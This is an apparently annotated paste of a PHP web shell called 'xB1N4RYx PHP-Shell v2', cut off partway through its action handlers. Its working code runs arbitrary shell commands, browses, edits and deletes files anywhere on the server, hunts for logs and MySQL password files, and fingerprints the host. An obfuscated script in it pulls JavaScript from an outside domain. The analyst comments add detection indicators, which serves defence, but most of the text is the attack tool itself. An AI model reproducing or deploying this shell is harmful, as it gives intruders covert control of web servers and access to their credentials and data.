fiftytwohartzwhale

Untitled

Oct 26th, 2021
  1. <?php
  // Analyst note: hard-coded operator credentials checked by the login gate further down.
  // $u is the expected username. $p is 128 hex characters, the length of the SHA-512 digest
  // this script computes from the posted password. Both literals are stable strings for
  // content signatures on this sample.
  2. $u = "hf";
  3. $p = "123e6b6dac9310d2752a16d523bcbda9dd760d1adab999c97836eb7fcae2935f5be801b3fcbaec7bcd7ee6933b9271b99dc2cd861db4b9f5a80ac079baf3027c";
  4.  
  // Output buffering and a PHP session are started. The session carries the login state and
  // the browsing directory ('current_folder') between requests.
  5. ob_start();
  6. session_start();
  // Diagnostics are silenced: "@" hides the failure of set_magic_quotes_runtime() (removed in
  // PHP 7), the execution time limit is lifted, and error_reporting(0) turns off PHP error
  // reporting, so failures in this script may leave no trace in PHP error logs.
  7. @set_magic_quotes_runtime(0);
  8. set_time_limit(0);
  9. error_reporting(0);
  // Assigned but not read anywhere in the visible part of the file.
  10. $windows = 0;
  11.  
  /**
   * Recursively adds every file below $src to an already-open archive.
   *
   * @param string $src         Directory to walk.
   * @param mixed  $zip         Archive object, passed by reference; only addFile() is called on
   *                            it here (compress() passes a ZipArchive).
   * @param int    $path_length Number of leading characters cut from each full path to form
   *                            the entry name stored in the archive.
   *
   * The opendir() result is not checked, so an unreadable directory is not reported.
   */
  12. function recurse_zip($src,&$zip,$path_length) {
  13.         $dir = opendir($src);
  14.         while(false !== ( $file = readdir($dir)) ) {
  15.             if (( $file != '.' ) && ( $file != '..' )) {
  16.                 if ( is_dir($src . '/' . $file) ) {
  17.                     recurse_zip($src . '/' . $file,$zip,$path_length);
  18.                 }
  19.                 else {
  20.                     $zip->addFile($src . '/' . $file,substr($src . '/' . $file,$path_length));
  21.                 }
  22.             }
  23.         }
  24.         closedir($dir);
  25. }
  /**
   * Packs a file or a whole directory tree into a zip archive written to $xX.
   *
   * @param string $src Path of the file or directory to archive; a trailing "/" is dropped.
   * @param string $xX  Path of the zip file to create.
   *
   * On failure the function echoes an error string and calls exit, ending the request.
   * Analyst note: a zip file appearing under the web root next to this script is a host
   * artefact of this routine; presumably it backs the "downloadzip" action linked from the
   * directory listing (that handler is not in view here).
   */
  26. function compress($src, $xX)
  27. {
  28.         if(substr($src,-1)==='/'){$src=substr($src,0,-1);}
  29.         $arr_src=explode('/',$src);
  30.         $filename=$src;
  31.         unset($arr_src[count($arr_src)-1]);
  // Length of the parent path including its trailing slash; used to make entry names relative.
  32.         $path_length=strlen(implode('/',$arr_src).'/');
  33.         $f=explode('.',$filename);
  34.         $filename=$f[0];
  // Both branches of the ternary yield $xX, so the name derived from $src above is never used.
  35.         $filename=(($filename=='')? $xX : $xX);
  36.         $zip = new ZipArchive;
  37.         $res = $zip->open($filename, ZipArchive::CREATE);
  38.         if($res !== TRUE){
  39.                 echo 'Error: Unable to create zip file';
  40.                 exit;}
  41.         if(is_file($src)){$zip->addFile($src,substr($src,$path_length));}
  42.         else{
  // Neither a file nor a directory: close, remove the archive path and stop.
  43.                 if(!is_dir($src)){
  44.                      $zip->close();
  45.                      @unlink($filename);
  46.                      echo 'Error: File not found';
  47.                      exit;}
  48.         recurse_zip($src,$zip,$path_length);}
  49.         $zip->close();
  50.         //exit;
  51. }
  52.  
  /**
   * Returns the text found between the first occurrence of $start and the next $end.
   *
   * @param string $string Text to search.
   * @param string $start  Opening delimiter.
   * @param string $end    Closing delimiter.
   * @return string The enclosed text, or "" when $start is not found.
   */
  53. function get_string_between($string, $start, $end){
  // A space is prepended so that a match at the very beginning lands on index 1, not 0.
  54.     $string = " ".$string;
  55.     $ini = strpos($string,$start);
  // Loose comparison: strpos() returning false (no match) also compares equal to 0 here.
  56.     if ($ini == 0) return "";
  57.     $ini += strlen($start);
  // If $end is missing, strpos() yields false and $len goes negative; substr() then reads a
  // negative length as "stop that many characters before the end of the string".
  58.     $len = strpos($string,$end,$ini) - $ini;
  59.     return substr($string,$ini,$len);
  60. }
  61.  
  /**
   * Reports whether $func is absent from the php.ini disable_functions list.
   *
   * @param string $func Function name to look up.
   * @return bool false when an entry equals $func, true otherwise.
   *
   * Entries are split on "," and not trimmed, so a list written with spaces after the commas
   * would not match here. Defender note: the script only consults this list, so a populated
   * disable_functions setting narrows what binary_shell() can fall back to.
   */
  62. function func_enabled($func){
  63.     $disabled = explode(',', ini_get('disable_functions'));
  64.     foreach ($disabled as $dis){
  65.         if($dis == $func)
  66.         return false;
  67.     }
  68.     return true;
  69. }
  70.  
  /**
   * Runs $cmd as an operating-system command through the first PHP execution function that
   * func_enabled() reports as available, in the order shell_exec, exec, system, passthru.
   *
   * @param string $cmd Command line, handed to the shell unescaped.
   * @return mixed Whatever the chosen function returns: shell_exec() gives the full output,
   *               exec() only the last output line, while system() and passthru() print the
   *               output themselves. Falls through (null) when all four are disabled.
   *
   * Detection note: every call spawns a child process of the web server / PHP worker.
   * Process-creation telemetry with that parent is the host-level signal for this routine.
   */
  71. function binary_shell($cmd){
  72.     if(func_enabled("shell_exec"))
  73.         return shell_exec($cmd);
  74.     else if(func_enabled("exec"))
  75.         return exec($cmd);
  76.     else if(func_enabled("system"))
  77.         return system($cmd);
  78.     else if(func_enabled("passthru"))
  79.         return passthru($cmd);
  80. }
  81.  
  /**
   * Returns the extension of $filename as reported by pathinfo().
   *
   * @param string $filename Path or file name.
   * @return mixed The 'extension' element; pathinfo() omits that key for names without an
   *               extension, so the result is null then (the notice is hidden by
   *               error_reporting(0)).
   */
  82. function fExt($filename)
  83. {
  84.     $path_info = pathinfo($filename);
  85.     return $path_info['extension'];
  86. }
  87.  
  // Extension lists consulted by the "view" action to pick an image or movie preview.
  88. $images = array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff");
  89. $movies = array("avi","mpg","mpeg");
  90.  
  // Login handling. The posted field names 'zun' and 'zpw' are request-level indicators for
  // this sample. The password is hashed with unsalted SHA-512 and compared with $p.
  91. $user = $_POST['zun'];
  92. $pass = hash("sha512", $_POST['zpw']);
  93. $pazz = $p;
  94.  
  // Unless the session already holds the expected pair, it is overwritten with whatever this
  // request posted (null username when nothing was posted). Comparisons are loose (!=).
  95. if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz)
  96. {
  97.     $_SESSION['zusrn'] = $user;
  98.     $_SESSION['zpass'] = $pass;
  99. }
  100.  
  // page=phpinfo is answered here, before any HTML, and only for a session holding the
  // expected username and hash; the top-level return ends the request.
  101. if($_GET['page'] == "phpinfo"){
  102.     if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz){
  103.     echo '<title>xB1N4RYx</title>';
  104.     phpinfo();
  105.     return;}
  106. }
  // Analyst note on the echo that follows: it emits the page header for every request, with
  // the title "xB1N4RYx" and an obfuscated inline script. The script maps each character of
  // MI (character code minus 48) to a position in ML and document.write()s the result, which
  // decodes to a SCRIPT tag loading hxxp://www[.]c99php[.]com/turk.js (defanged). A browser
  // rendering this page would therefore request that third-party host; treat the host name
  // and the ML/MI literals as indicators for proxy and content searches.
  107. echo '
  108. <html>
  109. <head>
  110. <title>xB1N4RYx</title>
  111. <script type="text/javascript" language="javascript">
  112. <!--
  113. ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
  114. MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
  115. OT="";
  116. for(j=0;j<MI.length;j++){
  117. OT+=ML.charAt(MI.charCodeAt(j)-48);
  118. }document.write(OT);
  119. // --></script>
  120. </head>
  121. <style>
  122. hr{
  123.     border: 1px solid #444444;
  124. }
  125. body{
  126. background: #000000;
  127. color: #CCCCCC;
  128. font-family: Verdana, Times New Roman;
  129. font-size: 11px;
  130. }
  131.  
  132. table{
  133. background: #000000;
  134. color: #CCCCCC;
  135. font-family: Verdana, Times New Roman;
  136. font-size: 11px;
  137. }
  138.  
  139. a:link{
  140. text-decoration: none;
  141. font-weight: bold;
  142. color: #888888;
  143. }
  144.  
  145. a:visited{
  146. text-decoration: none;
  147. font-weight: normal;
  148. color: #888888;
  149. }
  150.  
  151. a:active{
  152. text-decoration: none;
  153. font-weight: normal;
  154. color: #CC0000;
  155. }
  156.  
  157. a:hover{
  158. text-decoration: bold;
  159. font-weight: bold;
  160. color: #666666;
  161. }
  162.  
  163. #links{
  164. margin-top: 12px;
  165. margin-left: 10px;
  166. }
  167.  
  168. textarea{
  169. border: 1px solid #770000;
  170. background: #000000;
  171. color: #CCCCCC;
  172. font-family: Verdana, Times New Roman;
  173. font-size: 10px;
  174. }
  175.  
  176. #crypts{
  177. margin-top: -6px;
  178. }
  179.  
  180. #crypts input{
  181. color: #CCCCCC;
  182. background: #000000;
  183. border: 0px;
  184. text-align: center;
  185. }
  186.  
  187. #submit input{
  188. color: #CCCCCC;
  189. background: #000000;
  190. border: 1px solid #770000;
  191. text-align: center;
  192. }
  193.  
  194. #submits{
  195. margin-top: -24px;
  196. margin-left: 359px;
  197. }
  198.  
  199. #text input{
  200. color: #CCCCCC;
  201. background: #000000;
  202. border: 1px solid #770000;
  203. text-align: left;
  204. }
  205.  
  206. #dirs a:link{
  207. text-decoration: none;
  208. font-weight: none;
  209. font-size: 10px;
  210. color: #008888;
  211. }
  212.  
  213. #dirs a:visited{
  214. text-decoration: none;
  215. font-size: 10px;
  216. font-weight: none;
  217. color: #008888;
  218. }
  219.  
  220. #dirs a:active{
  221. text-decoration: none;
  222. font-weight: none;
  223. font-size: 10px;
  224. color: #008888;
  225. }
  226.  
  227. #dirs a:hover{
  228. text-decoration: none;
  229. font-weight: none;
  230. font-size: 10px;
  231. color: #006666;
  232. }
  233.  
  234. #files a:link{
  235. text-decoration: none;
  236. font-weight: none;
  237. font-size: 10px;
  238. color: #CCCCCC;
  239. }
  240.  
  241. #files a:visited{
  242. text-decoration: none;
  243. font-size: 10px;
  244. font-weight: none;
  245. color: #CCCCCC;
  246. }
  247.  
  248. #files a:active{
  249. text-decoration: none;
  250. font-weight: none;
  251. font-size: 10px;
  252. color: #CCCCCC;
  253. }
  254.  
  255. #files a:hover{
  256. text-decoration: none;
  257. font-weight: none;
  258. font-size: 10px;
  259. color: #888888;
  260. }
  261.  
  262. #pd a:link{
  263. text-decoration: none;
  264. font-weight: none;
  265. color: #0066BB;
  266. }
  267.  
  268. #pd a:visited{
  269. text-decoration: none;
  270. font-weight: none;
  271. color: #0066BB;
  272. }
  273.  
  274. #pd a:active{
  275. text-decoration: none;
  276. font-weight: none;
  277. color: #0066BB;
  278. }
  279.  
  280. #pd a:hover{
  281. text-decoration: none;
  282. font-weight: none;
  283. color: #0055AA;
  284. }
  285.  
  286. #login input{
  287. color: #CCCCCC;
  288. background: #000000;
  289. border: 1px solid #660000;
  290. border-radius: 5px;
  291. text-align: center;
  292. }
  293.  
  294. #phpe textarea{
  295. color: #CCCCCC;
  296. background: #000000;
  297. border: 1px solid #660000;
  298. border-radius: 7px;
  299. text-align: center;
  300. }
  301.  
  302. #cpath a:link{
  303. color: #0066BB;
  304. }
  305.  
  306. #cpath a:visited{
  307. color: #0066BB;
  308. }
  309.  
  310. #cpath a:active{
  311. color: #0066BB;
  312. }
  313.  
  314. #cpath a:hover{
  315. color: #0077CC;
  316. }
  317.  
  318. </style>
  319. <body>';
  320.  
  /**
   * Tests whether $haystack ends with $needle, by comparing the last strlen($needle)
   * characters of $haystack to $needle with ===.
   *
   * @param string $haystack Text to inspect.
   * @param string $needle   Expected suffix.
   * @return bool
   */
  321. function endsWith($haystack, $needle)
  322. {
  323.     $length = strlen($needle);
  324.     $start  = $length * -1; //negative
  325.     return (substr($haystack, $start) === $needle);
  326. }
  // Directory navigation state. $dslash / $cslash hold the separator to insert when joining
  // paths ("" when the value already ends in a slash or backslash).
  // Note for log review: this code runs on every request, ahead of the login check further down.
  327. if(endsWith($_GET['dir'], "\\")){ $dslash = ""; }
  328. else{ $dslash = "/"; }
  329. if(endsWith(realpath($_SESSION['current_folder']), "/") || endsWith(realpath($_SESSION['current_folder']), "\\")){ $cslash = ""; }
  330. else{ $cslash = "/"; }
  // page=list: the session's browsing directory starts at "./" and is then moved by the 'dir'
  // query parameter whenever the joined path is a directory. The path is not confined to any
  // base directory, so the listing can walk anywhere the PHP process is allowed to read.
  331. if($_GET['page'] == "list"){
  332. if(!isset($_SESSION['current_folder'])){ $_SESSION['current_folder'] = "./"; }
  333. else{
  334. if(is_dir(realpath($_SESSION['current_folder']).$cslash.$_GET['dir']))
  335.     $_SESSION['current_folder'] = realpath($_SESSION['current_folder']).$cslash.$_GET['dir'];
  336. }
  337. }
  338. echo '
  339. <table border="0" style="border: 0px solid #444444;" width="100%" height="100px">
  340. <tr>
  341. <td width="110px" style="text-align: right; padding-right: 5px;" valign="top">
  342. <b><font color="#555555">
  343. Software:&nbsp;<br>OS:&nbsp;<br>User:&nbsp;<br>PHP Version:&nbsp;<br>MySQL Version:&nbsp;<br>Server IP:&nbsp;<br>Safemode:&nbsp;<br>Disabled Funcs:&nbsp;<br>Disk Info:&nbsp;<br>Current Folder:&nbsp;<br>Shell Folder:&nbsp;
  344. </font></b>
  345. </td>
  346. <td valign="top">
  347. <b><font color="#777777" valign="top">';
  // Host fingerprint panel, printed in the page header. It sits above the login form code, so
  // it is produced for every request that reaches this point.
  348. $ts = disk_total_space("/")/1024/1024/1024;// IN GB
  349. $fs = disk_free_space("/")/1024/1024/1024;// IN GB
  // Server software string with the "PHP/<version>" token removed.
  350. $soft = str_replace("PHP/".phpversion()."", "", getenv("server_software"));
  351. echo $soft.'<br>';
  352. echo wordwrap(php_uname(),90," ",1).'<br>';
  // Detection note: an "id" process spawned by the web server on each page load.
  353. echo binary_shell("id").'<br>';
  354. echo phpversion().'<br>';
  // mysql_get_client_info() belongs to the legacy mysql extension removed in PHP 7; where that
  // extension is absent this call is a fatal error, which suggests the sample was written for
  // PHP 5 hosts.
  355. echo mysql_get_client_info().'<br>';
  356. echo getenv("server_name").'&nbsp;/&nbsp;'.gethostbyname(getenv("server_name")).'<br>';
  357. if (strtolower(@ini_get("safe_mode")) == "on" || @ini_get("safe_mode") == true)
  358. { echo '<font color="#990000">On</font><br>'; }
  359. else{ echo '<font color="#009900">Off</font><br>'; }
  // The configured disable_functions list is shown verbatim.
  360. if(@ini_get("disable_functions") == "")
  361.     echo "<font color='#009900'>None</font><br>";
  362. else
  363.     echo '<font color="#990000">'.@ini_get("disable_functions").'</font><br>';
  // Free space, total space and free percentage of "/"; $fs of 0 would divide by zero here.
  364. echo round($fs, 2).'&nbsp;GB&nbsp;Free'.'&nbsp;of&nbsp;Total&nbsp;'.round($ts, 2).'&nbsp;GB'.'&nbsp;('.round(100/($ts/$fs), 2).'%)<br>';
  365. if(preg_match("/\//i", realpath($_SESSION['current_folder']))){
  366.     $cpaths = explode('/', realpath($_SESSION['current_folder']));
  367.     $pathslash = '/';
  368. }
  369. else{
  370.     $cpaths = explode('\\', realpath($_SESSION['current_folder']));
  371.     $pathslash = '\\';
  372. }
  373. echo '<div id="cpath">';
  374. $asdAsD = 0;
  375. foreach($cpaths as $paths){
  376.     $buffer .= $paths.$pathslash;
  377.     if($asdAsD <= count($cpaths)-2){
  378.         echo '<a href="?page=go&goto='.$buffer.'">'.$paths.'</a><font color="#0066BB">'.$pathslash.'</font>';
  379.     }
  380.     else{
  381.         echo '<a href="?page=go&goto='.$buffer.'">'.$paths.'</a>';
  382.     }
  383.     $asdAsD++;
  384. }
  385. echo '</div>';
  386. //'.realpath($_SESSION['current_folder']).'
  387. //echo '<div id="cpath">';
  388. //echo ''.realpath($_SESSION['current_folder']).'</a></div>';
  389. //echo '<div id="cpath"><a href="?page=go&goto=/">'.realpath($_SESSION['current_folder']).'</a></div>';
  390. echo '<font color="#6C1B0A">'.realpath("./").'</font><br>';
  391. echo '
  392. </font></b>
  393. </td>
  394. <td style="text-align: right; padding-right: 5px;" valign="top">';
  395.  
  396. echo '<b><font color="#555555">Your IP: <font color="#777777">'.getenv("remote_addr").'</font></font></b>';
  397. if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz)
  398.     echo '<br><a href="?page=logout">Logout</a>';
  399. if(isset($_SESSION['muser']))
  400.     echo '<br><a href="?page=mylogout">MySQL Logout</a>';
  401.    
  402. echo '
  403. </td>
  404. </tr>
  405.  
  406. </table>
  407. <div id="links">
  408. <a href="?page=list">List Files</a>&nbsp;&nbsp;&nbsp;
  409. <a href="?page=crypt">Encrypt</a>&nbsp;&nbsp;&nbsp;
  410. <a href="?page=shell">Shell Execute</a>&nbsp;&nbsp;&nbsp;
  411. <a href="?page=go">Go To</a>&nbsp;&nbsp;&nbsp;
  412. <a href="?page=cf">Create File</a>&nbsp;&nbsp;&nbsp;
  413. <!--<a href="?page=df">Delete File</a>&nbsp;&nbsp;&nbsp;-->
  414. <a href="?page=cfo">Create Folder</a>&nbsp;&nbsp;&nbsp;
  415. <!--<a href="?page=dfo">Delete Folder</a>&nbsp;&nbsp;&nbsp;-->
  416. <a href="?page=mysql">MySQL Manager</a>&nbsp;&nbsp;&nbsp;
  417. <a href="?page=php">PHP Executer</a>&nbsp;&nbsp;&nbsp;
  418. <a href="?page=phpinfo" target="_blank">PHP Info</a>&nbsp;&nbsp;&nbsp;
  419. <a href="?page=upload">Upload File</a>&nbsp;&nbsp;&nbsp;
  420. <a href="?page=bcon">Back Connect</a>&nbsp;&nbsp;&nbsp;
  421. <a href="?page=sr"><font color="#CC0000">!</font> Self Remove <font color="#CC0000">!</font></a>&nbsp;&nbsp;&nbsp;
  422. <a href="?page=findlogs"><font color="#0189d2">!</font> Log Finder <font color="#0189d2">!</font></a>&nbsp;&nbsp;&nbsp;
  423. <a href="?page=findmysql"><font color="#02fe28">!</font> MySQL PW Finder <font color="#02fe28">!</font></a>&nbsp;&nbsp;&nbsp;
  424. </div>
  425. <br>
  426.  
  427. <table border="0" style="border: 1px solid #444444; padding: 5px;" width="100%">
  428. <tr>
  429. <td valign="top">';
  430.  
  // Login gate. When the session does not hold the expected username and password hash, the
  // login form is printed and the top-level return ends the request, so the action dispatcher
  // below is only reached by a session holding the expected pair.
  // $php_self is not assigned anywhere in the visible code, so the form action is empty and the
  // browser posts back to the current URL. The banner "xB1N4RYx PHP-Shell v2" and the input
  // names zun / zpw are response-body indicators for this sample.
  431. if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz)
  432. {
  433. echo '<form action="'.$php_self.'" method="post">';
  434. echo '<center>';
  435. echo 'xB1N4RYx PHP-Shell v2<br><br>';
  436. echo 'Username:<br><div id="login"><input type="text" id="zun" name="zun" maxlength="10"/><br><br>';
  437. echo 'Password:<br><input type="password" id="zpw" name="zpw" maxlength="10"/><br>';
  438. echo '</div><div id="submit"><input type="submit" value="Login"/>';
  439. echo '</div>';
  440. echo '</center>';
  441. echo '</form>';
  442. return;
  443. }
  444.  
  /**
   * Formats the size of $file for the directory listing.
   *
   * @param string $file Path passed to filesize().
   * @return string "~" for an empty file, "2 GB+" when filesize() reports a negative value
   *                (presumably integer overflow on 32-bit builds), otherwise the size rounded
   *                to one decimal in KB, MB or GB.
   *
   * filesize() is called again for every comparison rather than being read once.
   */
  445. function fsize($file){
  446. if(filesize($file) == 0)
  447.     return "~";
  448. if(filesize($file) < 0)
  449.     return "2 GB+";
  450. if(round(filesize($file)/1024/1024, 1) >= 1024)
  451.     return round(filesize($file)/1024/1024/1024, 1)." GB";
  452. if(round(filesize($file)/1024, 1) >= 1024)
  453.     return round(filesize($file)/1024/1024, 1)." MB";
  454. return round(filesize($file)/1024, 1)." KB";
  455. }
  456.  
  457. switch($_GET['page']){
  458.     default:
  459.         echo '<center>xB1N4RYx PHP-Shell v2</center>';
  460.     break;
  461.  
  462.     case "findlogs":
  463.         $fi = fopen("log.pl","w");
  464.         fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");');
  465.         fclose($fi);
  466.         $sh = binary_shell("perl log.pl ".getenv("remote_addr"));
  467.         $files = explode("\r\n",$sh);
  468.         echo "<center>Possible log files:<br><br>";
  469.         foreach($files as $file){
  470.             $f = get_string_between($file,"/",":");
  471.             $fa = '/'.get_string_between($file,"/","No such file");
  472.             if($f != "")
  473.                 echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."<br>";
  474.         }
  475.         echo "</center>";
  476.         unlink("log.pl");
  477.     break;
  478.    
  479.     case "findmysql":
  480.         $fi = fopen("sql.pl","w");
  481.         fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");');
  482.         fclose($fi);
  483.         $sh = binary_shell("perl sql.pl mysql_connect");
  484.         $files = explode("\r\n",$sh);
  485.         echo "<center>Possible mysql password files:<br><br>";
  486.         foreach($files as $file){
  487.             $f = get_string_between($file,"/",":");
  488.             $fa = '/'.get_string_between($file,"/","No such file");
  489.             if($f != "")
  490.                 echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."<br>";
  491.         }
  492.         echo "</center>";
  493.         unlink("sql.pl");
  494.     break;
  495.  
  496.     case "removelogs":
  497.        
  498.     break;
  499.    
  500.     case "list":
  501.         $dir = @opendir($_SESSION['current_folder']);
  502.         $xazz = 0;
  503.         if(!$dir){ $_SESSION['current_folder'] = "./"; }
  504.         echo '<table border="0" width="100%" cellspacing="0">';
  505.         echo '<tr><td width="35%"><div id="pd"><a href="?page=list&dir=..">&nbsp;&nbsp;&nbsp;Parent Directory</a></div></td><td width="20%"><center>File Size</center></td><td width="15%"><center>Extra Options</center></td><td width="15%"><center>Permissions</center></td><td width="*"><center>Options</center></td></tr>';
  506.         while (($dirs = @readdir($dir)) != false){
  507.             $color = array("#000000","#111111","#444444");
  508.         if(is_dir(realpath($_SESSION['current_folder'])."/".$dirs) && $dirs != "." && $dirs != ".."){
  509.             if($xazz == 1)
  510.                 $xazz--;
  511.             else
  512.                 $xazz++;
  513.             echo '<tr bgcolor="'.$color[$xazz].'" onMouseOver="this.bgColor=\''.$color[2].'\'" onMouseOut="this.bgColor=\''.$color[$xazz].'\'"><td><div id="dirs"><a href="?page=list&dir='.$dirs.'">'.$dirs.'</a></div></td><td><center>&nbsp;</center></td><td>&nbsp;</td><td>&nbsp;</td><td><center><a href="?page=downloadzip&f='.$dirs.'">Download</a>&nbsp;~&nbsp;<a href="?page=dfo&f='.$dirs.'">Delete</a></center></td></tr>';
  514.         }}
  515.         echo '<tr><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td></tr>';
  516.         $nondir = @opendir(realpath($_SESSION['current_folder']));
  517.         while (($files = @readdir($nondir)) != false){
  518.         if(!is_dir(realpath($_SESSION['current_folder'])."/".$files)){
  519.             if($xazz == 1)
  520.                 $xazz--;
  521.             else
  522.                 $xazz++;
  523.             echo '<tr bgcolor="'.$color[$xazz].'" onMouseOver="this.bgColor=\''.$color[2].'\'" onMouseOut="this.bgColor=\''.$color[$xazz].'\'"><td><div id="files"><a href="?page=view&file='.$files.'">'.$files.'</a></div></td><td><center>'.fsize(realpath($_SESSION['current_folder']).$cslash.$files).'</center></td>';
  524.             echo '<td>';
  525.             if(is_executable(realpath($_SESSION['current_folder']).$cslash.$files))
  526.                 echo '<center><a href="?page=stask&f='.$files.'">Start</a>&nbsp;~&nbsp;<a href="?page=ktask&f='.$files.'">Kill</a></center>';
  527.             else
  528.                 echo '&nbsp;';
  529.             $permissions = is_writeable($files);
  530.             if($permissions == true)
  531.                 $perms = '<font color="#00CC00"><b>Editable</b></font>';
  532.             else
  533.                 $perms = '<font color="#CC0000"><b>Locked</b></font>';
  534.             echo '<td>';
  535.             echo '<center>'.$perms.'</center>';
  536.             echo '</td>';
  537.             echo '</td>';
  538.             echo '<td><center><a href="?page=view&file='.$files.'&fc=1">Edit</a>&nbsp;~&nbsp;<a href="?page=downloadfile&f='.$files.'">Download</a>&nbsp;~&nbsp;<a href="?page=df&f='.$files.'">Delete</a></center></td></tr>';
  539.         }}
  540.         closedir($dir);
  541.         closedir($nondir);
  542.         echo '</table>';
  543.     break;
  544.    
  545.     case "crypt":
  546.         echo '<center>';
  547.             echo '<form action="?page=crypt" method="post">';
  548.             echo 'Input:<br><textarea rows="6" cols="45" id="ctext" name="ctext">'.$_POST['ctext'].'</textarea><br><br>';
  549.             echo '<div id="submit">';
  550.             echo '<input type="submit" value="Hash">';
  551.             echo '</div>';
  552.             echo '</form>';
  553.             echo '<div id="crypts">';
  554.             echo '<p>md5 <br> <input type="text" size="32" readonly value="'.hash("md5", $_POST['ctext']).'"/></p>';
  555.             echo '<p>sha1 <br> <input type="text" size="41" readonly value="'.hash("sha1", $_POST['ctext']).'"/></p>';
  556.             echo '<p>sha256 <br> <input type="text" size="68" readonly value="'.hash("sha256", $_POST['ctext']).'"/></p>';
  557.             echo '<p>sha384 <br> <input type="text" size="103" readonly value="'.hash("sha384", $_POST['ctext']).'"/></p>';
  558.             echo '<p>sha512 <br> <input type="text" size="139" readonly value="'.hash("sha512", $_POST['ctext']).'"/></p>';
  559.             echo '</div>';
  560.             echo '<hr style="border: 1px solid #333333;"/><a href="http://www.md5decrypter.co.uk/sha1-decrypt.aspx" target="_blank">Decrypt SHA1/MD5 Hashes</a>';
  561.         echo '</center>';
  562.     break;
  563.    
  564.     case "shell":
  565.         $sh = binary_shell("cd ".realpath($_SESSION["current_folder"])." && ".$_POST['cmd']);
  566.         echo '<form action="?page=shell" method="post">';
  567.         echo '<textarea rows="10" cols="80" readonly>'.$sh.'</textarea>';
  568.         echo '<br><div id="text">';
  569.         echo '<input type="text" name="cmd" id="cmd" style="margin-top: 3px; border-radius: 3px;" size="53"/>';
  570.         echo '<input type="submit" style="margin-left: 5px; border-radius: 3px; marign-top: 3px;" value="Execute"/>';
  571.         echo '</form>';
  572.     break;
  573.    
  574.     case "view":
  575.         $file = $_GET['file'];
  576.         $fc = $_GET['fc'];
  577.         if(!isset($fc)){ $fc = 0; }
  578.         if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $images, true) && $fc != 1){ echo '<center>Viewing Image<br>[ '.$file.' ]<hr/><a href="?page=downloadfile&f='.$file.'"><img src="?page=viewimage&i='.$file.'" border="0" style="padding: 10px;" alt="Download Image"/></a></center>'; break; }
  579.         if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $movies, true) && $fc != 1){ echo '<center><a href="?page=downloadfile&f='.$file.'"><object data="?page=viewmovie&i='.$file.'" type="video/quicktime" width="320" height="255"> <param name="src" value="?page=viewmovie&i='.$file.'"><param name="autoplay" value="false"><param name="autoStart" value="0"></object></center>'; break; }
  580.         $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$file), "r");
  581.         $fr = @fread($fo, filesize(realpath($_SESSION["current_folder"].$cslash.$file)));
  582.         echo '<form action="?page=saveedit" method="post">';
  583.         echo '<center>Editing '.realpath($_SESSION["current_folder"].$cslash.$file).'<br><a href="?page=highlight&file='.$file.'">Highlight PHP</a><br><br><div id="submit"><input type="submit" value="Save"/></div>';
  584.         echo '<textarea rows="54" cols="120" id="ctext" name="ctext">'.htmlspecialchars($fr).'</textarea>';
  585.         echo '<input type="hidden" value="'.$file.'" name="file" id="file" />';
  586.         echo '</center>';
  587.         echo '</form>';
  588.         fclose($fo);
  589.     break;
  590.    
  591.     case "saveedit":
  592.         $fs = $_POST['file'];
  593.         $fd = $_POST['ctext'];
  594.         if (get_magic_quotes_gpc()){
  595.     if (!function_exists("strips")){
  596.         function strips(&$arr,$k=""){
  597.             if (is_array($arr)){
  598.             foreach($arr as $k=>$v){
  599.                 if (strtoupper($k) != "GLOBALS"){
  600.                     strips($arr["$k"]);
  601.                                                 }
  602.                                     }
  603.                                 }
  604.     else{
  605.     $arr = stripslashes($arr);
  606.         }
  607.                                     }
  608.                                    }
  609.     strips($GLOBALS);
  610. }
  611.        
  612.         $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "w");
  613.         $fo2 = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "r");
  614.         $fw = @fwrite($fo, $fd);
  615.         $fr = @fread($fo2, filesize(realpath($_SESSION["current_folder"].$cslash.$fs)));
  616.         echo '<form action="?page=saveedit" method="post">';
  617.         echo '<center><h3>Saved!</h3>Editing '.realpath($_SESSION["current_folder"].$cslash.$fs).'<br><a href="?page=highlight&file='.$fs.'">Highlight PHP</a><br><br><div id="submit"><input type="submit" value="Save"/></div>';
  618.         echo '<textarea rows="54" cols="120" id="ctext" name="ctext">'.htmlspecialchars($fr).'</textarea>';
  619.         echo '<input type="hidden" value="'.$fs.'" name="file" id="file" />';
  620.         echo '</center>';
  621.         echo '</form>';
  622.         fclose($fo);
  623.         fclose($fo2);
  624.     break;
  625.    
  626.     case "highlight":
  627.         $fil = $_GET['file'];
  628.         $filz = realpath($_SESSION["current_folder"].$cslash.$fil);
  629.         echo '<tr>';
  630.         echo '<center><td bgcolor="#000000">';
  631.         echo '<center>Highlighting '.realpath($_SESSION["current_folder"].$cslash.$fil).'<br><a href="?page=view&file='.$fil.'">Edit</a>';
  632.         echo '</td></tr><tr>';
  633.         echo '<center><td bgcolor="#CCCCCC">';
  634.         $hl = highlight_file($filz, true);
  635.         echo $hl;
  636.         echo '</td></tr></center>';
  637.     break;
  638.    
  639.     case "logout":
  640.         session_destroy();
  641.         echo '<script type="text/javascript">location.href="?page=login";</script>';
  642.     break;
  643.    
  644.     case "mylogout":
  645.         unset($_SESSION['mhost']);
  646.         unset($_SESSION['mport']);
  647.         unset($_SESSION['muser']);
  648.         unset($_SESSION['mpass']);
  649.         unset($_SESSION['mlog']);
